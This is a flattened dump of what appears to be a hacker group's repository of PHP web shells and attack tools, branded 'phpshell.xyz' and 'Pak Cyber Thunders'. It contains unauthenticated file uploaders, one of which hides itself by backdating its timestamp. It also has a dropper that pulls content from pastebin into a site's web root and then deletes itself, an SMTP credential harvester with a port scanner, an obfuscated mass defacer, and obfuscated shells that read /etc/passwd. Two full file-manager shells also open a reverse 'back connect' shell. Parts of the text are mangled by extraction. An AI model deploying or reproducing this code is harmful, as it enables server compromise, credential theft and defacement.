Vuln!! patch it Now!

├── README.md ├── up.txt ├── upluad.php ├── OsComPayLoad.php ├── LICENSE ├── smtp.php ├── Mass Script Priv8 ├── shell4sym.php ├── 52.php ├── pak.php └── angel /README.md: -------------------------------------------------------------------------------- 1 | www.phpshell.xyz 2 | -------------------------------------------------------------------------------- /up.txt: -------------------------------------------------------------------------------- 1 | Vuln!! patch it Now! 2 | '; 4 | echo ''; 5 | if( $_POST['_upl'] == "Upload" ) { 6 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Shell Uploaded ! :)

'; } 7 | else { echo 'Not uploaded !

'; } 8 | } 9 | ?> 10 | -------------------------------------------------------------------------------- /upluad.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | utf 5 | 6 | 7 | Welcome\n"; 9 | echo "IP: "; 10 | echo $_SERVER['REMOTE_ADDR']; 11 | echo "
\n"; 12 | echo "
\n"; 13 | echo "
\n"; 14 | echo "
\n"; 15 | if(is_uploaded_file($_FILES["newfile"]["tmp_name"])) 16 | { 17 | move_uploaded_file($_FILES["newfile"]["tmp_name"], $_FILES["newfile"]["name"]); 18 | $file = $_FILES["newfile"]["name"]; 19 | echo "$file"; 20 | } else { 21 | echo("empty"); 22 | } 23 | $newfile = $_SERVER[SCRIPT_FILENAME]; 24 | $time = time() - 105360688; 25 | touch($newfile, $time); 26 | ?> 27 | 28 | 29 | -------------------------------------------------------------------------------- /OsComPayLoad.php: -------------------------------------------------------------------------------- 1 | Vuln!! patch it Now! 2 | "; 19 | }else 20 | echo "not exits"; 21 | echo "done .\n " ; 22 | $check2 = $_SERVER['DOCUMENT_ROOT'] . "/vuln.htm" ; 23 | $text2 = http_get('https://pastebin.com/raw/880ufaWF'); 24 | $open2 = fopen($check2, 'w'); 25 | fwrite($open2, $text2); 26 | fclose($open2); 27 | if(file_exists($check2)){ 28 | echo $check2."
"; 29 | }else 30 | echo "not exits"; 31 | echo "done .\n " ; 32 | @unlink(__FILE__); 33 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 phpshellxyz 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /smtp.php: -------------------------------------------------------------------------------- 1 | '.$t.'|25|'.$e.'@'.$t.'|'.$password.'
'; ""; 33 | }} 34 | //port scan 35 | foreach ($ports as $port) 36 | { 37 | $connection = @fsockopen($t, $port, $errno, $errstr, 2); 38 | if (is_resource($connection)) 39 | { 40 | echo '
' . $host . ':' . $port . ' ' . '(' . getservbyport($port, 'tcp') . ') is open.
' . "\n"; 41 | fclose($connection); 42 | } 43 | } 44 | ?> 45 | -------------------------------------------------------------------------------- /Mass Script Priv8: -------------------------------------------------------------------------------- 1 | Fo\x6cd\x65r\x20Ma\x73s\x20D\x65f\x61c\x65r by\x20B\x6c4\x63\x6b Ro\x6ft\x3c/t\x69\x74\x6ce>";echo"\x3c\x6c\x69\x6ek hr\x65\x66\x3d\x27\x68tt\x70://\x66o\x6e\x74s\x2eg\x6f\x6fg\x6c\x65\x61\x70\x69\x73\x2ec\x6f\x6d/\x63s\x73?\x66amil\x79\x3dEl\x65\x63\x74ro\x6c\x69z\x65\x27\x20re\x6c=\x27\x73t\x79les\x68\x65e\x74' \x74\x79pe=\x27\x74e\x78\x74/cs\x73'>";$rxglgt="\x6di\x6e";echo"<\x62o\x64\x79 \x62\x67\x63\x6f\x6c\x6fr='\x67r\x61\x79\x27><\x66on\x74 color\x3d\x62lac\x6b\x27>\x3cfont \x66ace\x3d'E\x6c\x65c\x74ro\x6cize\x27\x3e";echo"\x3cc\x65\x6e\x74\x65\x72\x3e\x3cform\x20m\x65t\x68\x6fd\x3d'P\x4f\x53\x54\x27\x3e";echo"\x3cimg\x20sr\x63='\x68\x74tps://\x69ma\x67\x65.\x73\x70\x72\x65\x61\x64\x73\x68\x69\x72t\x6d\x65di\x61\x2en\x65\x74/im\x61\x67\x65-se\x72\x76er/\x76\x31/de\x73\x69\x67\x6e\x73/1\x34\x37\x32\x37\x34\x39\x36,wi\x64\x74h=\x317\x38,\x68e\x69g\x68t=1\x378,\x76e\x72\x73\x69\x6f\x6e\x3d1\x338\x35\x36\x325\x32\x30\x31/\x66\x75ck-a\x6e\x6fn\x79m\x6fus-\x6das\x6b.\x70\x6e\x67\x27>\n
\x3cfo\x6et\x20c\x6fl\x6fr='\x62\x6c\x61\x63\x6b'\x3e\x54\x61rge\x74 \x46o\x6cd\x65r\x3c/\x66\x6fnt\x3e\x3c\x62\x72\x3e\n\x3cbr\x3e\x3cb\x72\x3e";echo"<\x66ont\x20\x63o\x6co\x72\x3d\x27b\x6ca\x63\x6b\x27\x3e\x4eam\x65\x20o\x66\x20F\x69le\x3cbr\x3eHac\x6be\x64\x20\x42\x79 p\x68\x70\x73\x68e\x6cl\x2e\x78\x79z > Hecto\x72 &\x20Tol\x61nk\x31";echo"";if(isset($_POST["\x62\x61\x73\x65\x5fdir"])){${"\x47L\x4fB\x41L\x53"}["\x76\x72\x6ac\x71hx\x78"]="\x66i\x6ce\x73";if(!file_exists($_POST["b\x61\x73e_dir"]))die($_POST["base\x5fdi\x72"]." N\x6f\x74 \x46o\x75nd !");$jbkugdkoc="\x66\x69\x6ce";@chdir($_POST["\x62as\x65\x5fd\x69\x72"])or die("\x43ann\x6ft\x20\x4f\x70\x65\x6e \x44i\x72\x65\x63tor\x79");${${"\x47L\x4fB\x41\x4c\x53"}["v\x72\x6ac\x71\x68\x78x"]}=@scandir($_POST["b\x61\x73e\x5fdi\x72"])or die("\x46\x75ck\x20u\x20-\x5f-\x20");foreach(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6amq\x73p\x7aw\x6e\x61\x70\x61"]} as${$jbkugdkoc}){if(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["wt\x6cv\x68\x72\x76\x62u\x77f"]}!="\x2e"&&${${"\x47\x4c\x4fB\x41\x4c\x53"}["w\x74\x6c\x76\x68rv\x62\x75\x77\x66"]}!=".\x2e"&&@filetype(${${"G\x4c\x4fB\x41LS"}["\x77\x74\x6c\x76\x68\x72vbuw\x66"]})=="\x64\x69r"){${${"\x47\x4cO\x42A\x4cS"}["\x74\x75\x62\x62\x75\x73w\x77"]}=getcwd()."/".${${"\x47\x4c\x4f\x42A\x4cS"}["wtl\x76\x68\x72\x76b\x75\x77f"]}."/".$_POST["a\x6e\x64\x65\x6c\x61"];${"\x47L\x4f\x42A\x4c\x53"}["f\x6ay\x63\x65\x65"]="\x69n\x64\x65\x78";if(file_put_contents(${${"\x47L\x4f\x42\x41L\x53"}["\x66\x6a\x79\x63e\x65"]},$_POST["i\x6ed\x65x"]))echo"<\x68r\x20c\x6fl\x6f\x72='b\x6c\x61\x63\x6b'\x3e\x3e\x3e\x20 3 | -------------------------------------------------------------------------------- /shell4sym.php: -------------------------------------------------------------------------------- 1 | p\x68\x70she\x6c\x6c\x2e\x78y\x7a\x20/\x20s\x68\x65ll\x34\x2e\x63\x6f\x6d \x3e\x3cfont \x63\x6f\x6c\x6f\x72=\x22\x72\x65d\x22>Hect\x6fr\x20\x26 \x54\x6fl\x61\x6e\x6b1 \x3c/fon\x74>\x3c/\x62>\x3c/\x66o\x6e\x74>\x3cb\x72>\n<\x63\x65\x6e\x74e\x72\x3e";echo"<\x68\x31\x3e\x75p\x3c/h1>\n";${"\x47L\x4f\x42AL\x53"}["\x6eee\x67bn\x73\x6f\x71"]="\x6eew\x66\x69le";$uyykde="t\x69\x6d\x65";echo"IP:\x20";echo$_SERVER["\x52\x45MO\x54E\x5fAD\x44\x52"];echo"\x3c\x66\x6f\x72\x6d\x20me\x74hod=\"\x70o\x73t\x22 \x65\x6e\x63\x74\x79\x70e\x3d\"mu\x6c\x74ipa\x72t/for\x6d-da\x74a\x22>\n";echo"\x3cinp\x75t \x74\x79pe=\"fi\x6ce\x22 n\x61m\x65=\"n\x65wfi\x6c\x65\x22\x3e<\x62\x72\x3e\x20\n";echo"\x3c\x69\x6ep\x75\x74 \x74\x79pe=\x22\x73\x75\x62\x6di\x74\x22 \x76al\x75\x65=\"Y\x75k\x6c\x65\x20\x62\x61bba\x22\x3e
\n";echo"\n";if(is_uploaded_file($_FILES["new\x66ile"]["t\x6d\x70\x5f\x6e\x61me"])){${"\x47L\x4fB\x41\x4c\x53"}["\x6c\x71klc\x72j"]="\x66\x69\x6c\x65";move_uploaded_file($_FILES["n\x65\x77\x66\x69\x6ce"]["t\x6d\x70\x5f\x6e\x61m\x65"],$_FILES["new\x66i\x6ce"]["na\x6de"]);${${"GL\x4f\x42A\x4c\x53"}["\x6cq\x6b\x6c\x63r\x6a"]}=$_FILES["\x6ee\x77\x66i\x6c\x65"]["\x6e\x61m\x65"];echo"\x3c/a>";}else{echo"\x3cce\x6eter>\x3cf\x6f\x72m\x20\x6de\x74hod=\x27\x50\x4fS\x54\x27 \x61\x63\x74i\x6f\x6e=\x27'>\n\x3c\x74e\x78\x74a\x72\x65a\x20na\x6de=\x27\x70\x61s\x73\x77\x64' r\x6f\x77s='\x31\x35\x27 \x63\x6f\x6c\x73='6\x30\x27>";echo include("/et\x63/pass\x77\x64");echo"\x3c\x62\x72\x3e";echo"\x3cinpu\x74 t\x79\x70e='\x73ubmit\x27\x20\x6e\x61\x6d\x65\x3d\x27\x6ae\x6d\x62\x75\x64\x27\x20\x76alue\x3d'\x46uck\x6ca\x21'\x3e 3 | -------------------------------------------------------------------------------- /52.php: -------------------------------------------------------------------------------- 1 | 2 |
Pak Cyber Thunders
3 | 4 | '; 15 | } 16 | echo '
'; 17 | echo 'SysTeM INFO : '.php_uname().''; 18 | echo '
'; 19 | echo 'PHP VerSion : '. phpversion() .''; 20 | echo '
'; 21 | echo 'SeRver AdMin : '.$_SERVER['SERVER_ADMIN'].''; 22 | echo '
'; 23 | echo 'SerVer IP : '.$_SERVER['SERVER_ADDR'].' '; 24 | echo 'YoUr IP : '.$_SERVER['REMOTE_ADDR'].''; 25 | echo "
"; 26 | echo "SaFe MoDe : "; 27 | // Check for safe mode 28 | if( ini_get('safe_mode') ) { 29 | print 'ON'; 30 | } else { 31 | print 'OFF'; 32 | } 33 | echo "
"; 34 | echo "Read etc/passwd : $etc_passwd"; 35 | echo "Functions : ";echo " PHP INFO "; 36 | if(@$_GET['p']=="info"){@phpinfo(); 37 | exit;} 38 | ?> 39 |
40 | 41 | 42 | Back Connect 43 |
44 | IP : 45 | PORt : 46 | 47 | 48 | array("pipe", "r"), // stdin is a pipe that the child will read from 115 | 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 116 | 2 => array("pipe", "w") // stderr is a pipe that the child will write to 117 | ); 118 | 119 | $process = proc_open($shell, $descriptorspec, $pipes); 120 | 121 | if (!is_resource($process)) { 122 | printit("ERROR: Can't spawn shell"); 123 | exit(1); 124 | } 125 | 126 | // Set everything to non-blocking 127 | // Reason: Occsionally reads will block, even though stream_select tells us they won't 128 | stream_set_blocking($pipes[0], 0); 129 | stream_set_blocking($pipes[1], 0); 130 | stream_set_blocking($pipes[2], 0); 131 | stream_set_blocking($sock, 0); 132 | 133 | printit(""); 134 | 135 | while (1) { 136 | // Check for end of TCP connection 137 | if (feof($sock)) { 138 | printit(" :- TCP connection ended"); 139 | break; 140 | } 141 | 142 | // Check for end of STDOUT 143 | if (feof($pipes[1])) { 144 | printit("END of STDOUT"); 145 | break; 146 | } 147 | 148 | // Wait until a command is end down $sock, or some 149 | // command output is available on STDOUT or STDERR 150 | $read_a = array($sock, $pipes[1], $pipes[2]); 151 | $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 152 | 153 | // If we can read from the TCP socket, send 154 | // data to process's STDIN 155 | if (in_array($sock, $read_a)) { 156 | if ($debug) printit("SOCK READ"); 157 | $input = fread($sock, $chunk_size); 158 | if ($debug) printit("SOCK: $input"); 159 | fwrite($pipes[0], $input); 160 | } 161 | 162 | // If we can read from the process's STDOUT 163 | // send data down tcp connection 164 | if (in_array($pipes[1], $read_a)) { 165 | if ($debug) printit("STDOUT READ"); 166 | $input = fread($pipes[1], $chunk_size); 167 | if ($debug) printit("STDOUT: $input"); 168 | fwrite($sock, $input); 169 | } 170 | 171 | // If we can read from the process's STDERR 172 | // send data down tcp connection 173 | if (in_array($pipes[2], $read_a)) { 174 | if ($debug) printit("STDERR READ"); 175 | $input = fread($pipes[2], $chunk_size); 176 | if ($debug) printit("STDERR: $input"); 177 | fwrite($sock, $input); 178 | } 179 | } 180 | 181 | fclose($sock); 182 | fclose($pipes[0]); 183 | fclose($pipes[1]); 184 | fclose($pipes[2]); 185 | proc_close($process); 186 | 187 | // Like print, but does nothing if we've daemonised ourself 188 | // (I can't figure out how to redirect STDOUT like a proper daemon) 189 | break; 190 | } 191 | 192 | 193 | ?> 194 | 195 | '; 196 | $value){ 203 | $_POST[$key] = stripslashes($value); 204 | } 205 | } 206 | echo ' 207 | 208 | 209 | 210 | PAK CYBER THUNDERS 211 | 252 | 253 | 254 | 255 |
5 | 6 | ON " : " Disabled "; 9 | echo 'Disable Functions: '; 10 | if ('' == ($func = @ini_get('disable_functions'))) { 11 | echo "NONE"; 12 | } else { 13 | echo "$func"; 14 | echo '
256 | '; 295 | if(isset($_GET['filesrc'])){ 296 | echo "
257 | 258 | Current Path : '; 259 | if(isset($_GET['path'])){ 260 | $path = $_GET['path']; 261 | }else{ 262 | $path = getcwd(); 263 | } 264 | $path = str_replace('\\','/',$path); 265 | $paths = explode('/',$path); 266 | 267 | foreach($paths as $id=>$pat){ 268 | if($pat == '' && $id == 0){ 269 | $a = true; 270 | echo '/'; 271 | continue; 272 | } 273 | if($pat == '') continue; 274 | echo ''.$pat.'/'; 280 | } 281 | echo '
'; 282 | if(isset($_FILES['file'])){ 283 | if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ 284 | echo 'File Upload Done :D
'; 285 | }else{ 286 | echo 'File Upload Error :(
'; 287 | } 288 | } 289 | echo ''; 290 | echo '
291 | File Upload : 292 | 293 |
294 |
Current File : "; 297 | echo $_GET['filesrc']; 298 | echo '

'; 299 | echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
'); 300 | }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ 301 | echo '
'.$_POST['path'].'

'; 302 | if($_POST['opt'] == 'chmod'){ 303 | if(isset($_POST['perm'])){ 304 | if(chmod($_POST['path'],$_POST['perm'])){ 305 | echo 'Change Permission Done :D
'; 306 | }else{ 307 | echo 'Change Permission Error :(
'; 308 | } 309 | } 310 | echo '
311 | Permission : 312 | 313 | 314 | 315 |
'; 316 | }elseif($_POST['opt'] == 'rename'){ 317 | if(isset($_POST['newname'])){ 318 | if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ 319 | echo 'Change Name Done :D
'; 320 | }else{ 321 | echo 'Change Name Error :(
'; 322 | } 323 | $_POST['name'] = $_POST['newname']; 324 | } 325 | echo '
326 | New Name : 327 | 328 | 329 | 330 |
'; 331 | }elseif($_POST['opt'] == 'edit'){ 332 | if(isset($_POST['src'])){ 333 | $fp = fopen($_POST['path'],'w'); 334 | if(fwrite($fp,$_POST['src'])){ 335 | echo 'Edit File Done :D
'; 336 | }else{ 337 | echo 'Edit File Error :(
'; 338 | } 339 | fclose($fp); 340 | } 341 | echo '
342 | '.htmlspecialchars(file_get_contents($_POST['path'])).'
343 | 344 | 345 | 346 |
'; 347 | } 348 | echo ''; 349 | }else{ 350 | echo '
'; 351 | if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ 352 | if($_POST['type'] == 'dir'){ 353 | if(rmdir($_POST['path'])){ 354 | echo 'Delete Dir Done :D
'; 355 | }else{ 356 | echo 'Delete Dir Error :(
'; 357 | } 358 | }elseif($_POST['type'] == 'file'){ 359 | if(unlink($_POST['path'])){ 360 | echo 'Delete File Done :D
'; 361 | }else{ 362 | echo 'Delete File Error :(
'; 363 | } 364 | } 365 | } 366 | echo ''; 367 | $scandir = scandir($path); 368 | echo '
369 | 370 | 371 | 372 | 373 | 374 | '; 375 | 376 | foreach($scandir as $dir){ 377 | if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; 378 | echo " 379 | 380 | 381 | 388 | 400 | "; 401 | } 402 | echo ''; 403 | foreach($scandir as $file){ 404 | if(!is_file("$path/$file")) continue; 405 | $size = filesize("$path/$file")/1024; 406 | $size = round($size,3); 407 | if($size >= 1024){ 408 | $size = round($size/1024,2).' MB'; 409 | }else{ 410 | $size = $size.' KB'; 411 | } 412 | 413 | echo " 414 | 415 | 416 | 422 | 435 | "; 436 | } 437 | echo '
Name Size Permissions Options
$dir -- "; 382 | if(is_writable("$path/$dir")) echo ''; 383 | elseif(!is_readable("$path/$dir")) echo ''; 384 | echo perms("$path/$dir"); 385 | if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; 386 | 387 | echo "
389 | 395 | 396 | 397 | 398 | \" /> 399 |
$file ".$size." "; 417 | if(is_writable("$path/$file")) echo ''; 418 | elseif(!is_readable("$path/$file")) echo ''; 419 | echo perms("$path/$file"); 420 | if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; 421 | echo "
423 | 430 | 431 | 432 | 433 | \" /> 434 |
438 |
'; 439 | } 440 | echo '
PAK CYBER THUNDERS || Pakistan Zindabad|| 441 | 442 | 443 | '; 444 | function perms($file){ 445 | $perms = fileperms($file); 446 | 447 | if (($perms & 0xC000) == 0xC000) { 448 | // Socket 449 | $info = 's'; 450 | } elseif (($perms & 0xA000) == 0xA000) { 451 | // Symbolic Link 452 | $info = 'l'; 453 | } elseif (($perms & 0x8000) == 0x8000) { 454 | // Regular 455 | $info = '-'; 456 | } elseif (($perms & 0x6000) == 0x6000) { 457 | // Block special 458 | $info = 'b'; 459 | } elseif (($perms & 0x4000) == 0x4000) { 460 | // Directory 461 | $info = 'd'; 462 | } elseif (($perms & 0x2000) == 0x2000) { 463 | // Character special 464 | $info = 'c'; 465 | } elseif (($perms & 0x1000) == 0x1000) { 466 | // FIFO pipe 467 | $info = 'p'; 468 | } else { 469 | // Unknown 470 | $info = 'u'; 471 | } 472 | 473 | // Owner 474 | $info .= (($perms & 0x0100) ? 'r' : '-'); 475 | $info .= (($perms & 0x0080) ? 'w' : '-'); 476 | $info .= (($perms & 0x0040) ? 477 | (($perms & 0x0800) ? 's' : 'x' ) : 478 | (($perms & 0x0800) ? 'S' : '-')); 479 | 480 | // Group 481 | $info .= (($perms & 0x0020) ? 'r' : '-'); 482 | $info .= (($perms & 0x0010) ? 'w' : '-'); 483 | $info .= (($perms & 0x0008) ? 484 | (($perms & 0x0400) ? 's' : 'x' ) : 485 | (($perms & 0x0400) ? 'S' : '-')); 486 | 487 | // World 488 | $info .= (($perms & 0x0004) ? 'r' : '-'); 489 | $info .= (($perms & 0x0002) ? 'w' : '-'); 490 | $info .= (($perms & 0x0001) ? 491 | (($perms & 0x0200) ? 't' : 'x' ) : 492 | (($perms & 0x0200) ? 'T' : '-')); 493 | 494 | return $info; 495 | } 496 | ?> 497 | -------------------------------------------------------------------------------- /pak.php: -------------------------------------------------------------------------------- 1 | 2 |
Pak Cyber Thunders
3 | 4 | '; 15 | } 16 | echo '
'; 17 | echo 'SysTeM INFO : '.php_uname().''; 18 | echo '
'; 19 | echo 'PHP VerSion : '. phpversion() .''; 20 | echo '
'; 21 | echo 'SeRver AdMin : '.$_SERVER['SERVER_ADMIN'].''; 22 | echo '
'; 23 | echo 'SerVer IP : '.$_SERVER['SERVER_ADDR'].' '; 24 | echo 'YoUr IP : '.$_SERVER['REMOTE_ADDR'].''; 25 | echo "
"; 26 | echo "SaFe MoDe : "; 27 | // Check for safe mode 28 | if( ini_get('safe_mode') ) { 29 | print 'ON'; 30 | } else { 31 | print 'OFF'; 32 | } 33 | echo "
"; 34 | echo "Read etc/passwd : $etc_passwd"; 35 | echo "Functions : ";echo " PHP INFO "; 36 | if(@$_GET['p']=="info"){@phpinfo(); 37 | exit;} 38 | ?> 39 |
40 | 41 | 42 | Back Connect 43 |
44 | IP : 45 | PORt : 46 | 47 | 48 | array("pipe", "r"), // stdin is a pipe that the child will read from 115 | 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 116 | 2 => array("pipe", "w") // stderr is a pipe that the child will write to 117 | ); 118 | 119 | $process = proc_open($shell, $descriptorspec, $pipes); 120 | 121 | if (!is_resource($process)) { 122 | printit("ERROR: Can't spawn shell"); 123 | exit(1); 124 | } 125 | 126 | // Set everything to non-blocking 127 | // Reason: Occsionally reads will block, even though stream_select tells us they won't 128 | stream_set_blocking($pipes[0], 0); 129 | stream_set_blocking($pipes[1], 0); 130 | stream_set_blocking($pipes[2], 0); 131 | stream_set_blocking($sock, 0); 132 | 133 | printit(""); 134 | 135 | while (1) { 136 | // Check for end of TCP connection 137 | if (feof($sock)) { 138 | printit(" :- TCP connection ended"); 139 | break; 140 | } 141 | 142 | // Check for end of STDOUT 143 | if (feof($pipes[1])) { 144 | printit("END of STDOUT"); 145 | break; 146 | } 147 | 148 | // Wait until a command is end down $sock, or some 149 | // command output is available on STDOUT or STDERR 150 | $read_a = array($sock, $pipes[1], $pipes[2]); 151 | $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 152 | 153 | // If we can read from the TCP socket, send 154 | // data to process's STDIN 155 | if (in_array($sock, $read_a)) { 156 | if ($debug) printit("SOCK READ"); 157 | $input = fread($sock, $chunk_size); 158 | if ($debug) printit("SOCK: $input"); 159 | fwrite($pipes[0], $input); 160 | } 161 | 162 | // If we can read from the process's STDOUT 163 | // send data down tcp connection 164 | if (in_array($pipes[1], $read_a)) { 165 | if ($debug) printit("STDOUT READ"); 166 | $input = fread($pipes[1], $chunk_size); 167 | if ($debug) printit("STDOUT: $input"); 168 | fwrite($sock, $input); 169 | } 170 | 171 | // If we can read from the process's STDERR 172 | // send data down tcp connection 173 | if (in_array($pipes[2], $read_a)) { 174 | if ($debug) printit("STDERR READ"); 175 | $input = fread($pipes[2], $chunk_size); 176 | if ($debug) printit("STDERR: $input"); 177 | fwrite($sock, $input); 178 | } 179 | } 180 | 181 | fclose($sock); 182 | fclose($pipes[0]); 183 | fclose($pipes[1]); 184 | fclose($pipes[2]); 185 | proc_close($process); 186 | 187 | // Like print, but does nothing if we've daemonised ourself 188 | // (I can't figure out how to redirect STDOUT like a proper daemon) 189 | break; 190 | } 191 | 192 | 193 | ?> 194 | 195 | '; 196 | $value){ 203 | $_POST[$key] = stripslashes($value); 204 | } 205 | } 206 | echo ' 207 | 208 | 209 | 210 | PAK CYBER THUNDERS 211 | 252 | 253 | 254 | 255 |
5 | 6 | ON " : " Disabled "; 9 | echo 'Disable Functions: '; 10 | if ('' == ($func = @ini_get('disable_functions'))) { 11 | echo "NONE"; 12 | } else { 13 | echo "$func"; 14 | echo '
256 | '; 295 | if(isset($_GET['filesrc'])){ 296 | echo "
257 | 258 | Current Path : '; 259 | if(isset($_GET['path'])){ 260 | $path = $_GET['path']; 261 | }else{ 262 | $path = getcwd(); 263 | } 264 | $path = str_replace('\\','/',$path); 265 | $paths = explode('/',$path); 266 | 267 | foreach($paths as $id=>$pat){ 268 | if($pat == '' && $id == 0){ 269 | $a = true; 270 | echo '/'; 271 | continue; 272 | } 273 | if($pat == '') continue; 274 | echo ''.$pat.'/'; 280 | } 281 | echo '
'; 282 | if(isset($_FILES['file'])){ 283 | if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ 284 | echo 'File Upload Done :D
'; 285 | }else{ 286 | echo 'File Upload Error :(
'; 287 | } 288 | } 289 | echo ''; 290 | echo '
291 | File Upload : 292 | 293 |
294 |
Current File : "; 297 | echo $_GET['filesrc']; 298 | echo '

'; 299 | echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
'); 300 | }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ 301 | echo '
'.$_POST['path'].'

'; 302 | if($_POST['opt'] == 'chmod'){ 303 | if(isset($_POST['perm'])){ 304 | if(chmod($_POST['path'],$_POST['perm'])){ 305 | echo 'Change Permission Done :D
'; 306 | }else{ 307 | echo 'Change Permission Error :(
'; 308 | } 309 | } 310 | echo '
311 | Permission : 312 | 313 | 314 | 315 |
'; 316 | }elseif($_POST['opt'] == 'rename'){ 317 | if(isset($_POST['newname'])){ 318 | if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ 319 | echo 'Change Name Done :D
'; 320 | }else{ 321 | echo 'Change Name Error :(
'; 322 | } 323 | $_POST['name'] = $_POST['newname']; 324 | } 325 | echo '
326 | New Name : 327 | 328 | 329 | 330 |
'; 331 | }elseif($_POST['opt'] == 'edit'){ 332 | if(isset($_POST['src'])){ 333 | $fp = fopen($_POST['path'],'w'); 334 | if(fwrite($fp,$_POST['src'])){ 335 | echo 'Edit File Done :D
'; 336 | }else{ 337 | echo 'Edit File Error :(
'; 338 | } 339 | fclose($fp); 340 | } 341 | echo '
342 | '.htmlspecialchars(file_get_contents($_POST['path'])).'
343 | 344 | 345 | 346 |
'; 347 | } 348 | echo ''; 349 | }else{ 350 | echo '
'; 351 | if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ 352 | if($_POST['type'] == 'dir'){ 353 | if(rmdir($_POST['path'])){ 354 | echo 'Delete Dir Done :D
'; 355 | }else{ 356 | echo 'Delete Dir Error :(
'; 357 | } 358 | }elseif($_POST['type'] == 'file'){ 359 | if(unlink($_POST['path'])){ 360 | echo 'Delete File Done :D
'; 361 | }else{ 362 | echo 'Delete File Error :(
'; 363 | } 364 | } 365 | } 366 | echo ''; 367 | $scandir = scandir($path); 368 | echo '
369 | 370 | 371 | 372 | 373 | 374 | '; 375 | 376 | foreach($scandir as $dir){ 377 | if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; 378 | echo " 379 | 380 | 381 | 388 | 400 | "; 401 | } 402 | echo ''; 403 | foreach($scandir as $file){ 404 | if(!is_file("$path/$file")) continue; 405 | $size = filesize("$path/$file")/1024; 406 | $size = round($size,3); 407 | if($size >= 1024){ 408 | $size = round($size/1024,2).' MB'; 409 | }else{ 410 | $size = $size.' KB'; 411 | } 412 | 413 | echo " 414 | 415 | 416 | 422 | 435 | "; 436 | } 437 | echo '
Name Size Permissions Options
$dir -- "; 382 | if(is_writable("$path/$dir")) echo ''; 383 | elseif(!is_readable("$path/$dir")) echo ''; 384 | echo perms("$path/$dir"); 385 | if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; 386 | 387 | echo "
389 | 395 | 396 | 397 | 398 | \" /> 399 |
$file ".$size." "; 417 | if(is_writable("$path/$file")) echo ''; 418 | elseif(!is_readable("$path/$file")) echo ''; 419 | echo perms("$path/$file"); 420 | if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; 421 | echo "
423 | 430 | 431 | 432 | 433 | \" /> 434 |
438 |
'; 439 | } 440 | echo '
PAK CYBER THUNDERS || Pakistan Zindabad|| 441 | 442 | 443 | '; 444 | function perms($file){ 445 | $perms = fileperms($file); 446 | 447 | if (($perms & 0xC000) == 0xC000) { 448 | // Socket 449 | $info = 's'; 450 | } elseif (($perms & 0xA000) == 0xA000) { 451 | // Symbolic Link 452 | $info = 'l'; 453 | } elseif (($perms & 0x8000) == 0x8000) { 454 | // Regular 455 | $info = '-'; 456 | } elseif (($perms & 0x6000) == 0x6000) { 457 | // Block special 458 | $info = 'b'; 459 | } elseif (($perms & 0x4000) == 0x4000) { 460 | // Directory 461 | $info = 'd'; 462 | } elseif (($perms & 0x2000) == 0x2000) { 463 | // Character special 464 | $info = 'c'; 465 | } elseif (($perms & 0x1000) == 0x1000) { 466 | // FIFO pipe 467 | $info = 'p'; 468 | } else { 469 | // Unknown 470 | $info = 'u'; 471 | } 472 | 473 | // Owner 474 | $info .= (($perms & 0x0100) ? 'r' : '-'); 475 | $info .= (($perms & 0x0080) ? 'w' : '-'); 476 | $info .= (($perms & 0x0040) ? 477 | (($perms & 0x0800) ? 's' : 'x' ) : 478 | (($perms & 0x0800) ? 'S' : '-')); 479 | 480 | // Group 481 | $info .= (($perms & 0x0020) ? 'r' : '-'); 482 | $info .= (($perms & 0x0010) ? 'w' : '-'); 483 | $info .= (($perms & 0x0008) ? 484 | (($perms & 0x0400) ? 's' : 'x' ) : 485 | (($perms & 0x0400) ? 'S' : '-')); 486 | 487 | // World 488 | $info .= (($perms & 0x0004) ? 'r' : '-'); 489 | $info .= (($perms & 0x0002) ? 'w' : '-'); 490 | $info .= (($perms & 0x0001) ? 491 | (($perms & 0x0200) ? 't' : 'x' ) : 492 | (($perms & 0x0200) ? 'T' : '-')); 493 | 494 | return $info; 495 | } 496 | ?> 497 